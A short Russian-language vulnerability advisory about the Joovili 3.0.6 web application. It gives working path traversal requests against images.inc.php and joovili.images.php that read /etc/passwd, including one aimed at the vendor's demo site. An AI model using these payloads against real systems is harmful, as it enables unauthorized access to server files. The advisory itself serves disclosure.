Программа: Joovili 3.0.6

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных сценарием images.inc.php или joovili.images.php (для версии 3.x). Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

Версия: 2.x

include/images.inc.php?picture=../../../../../../../../ etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../ ..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

Версия 3.x

joovili.images.php?picture=../../../../../../../../// etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..// ../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

Демо

http://demo.joovili.com/include/joovili.images.php? picture=../../../../../../../..///etc/passwd&thumbnail=FALSE



Оставить мнение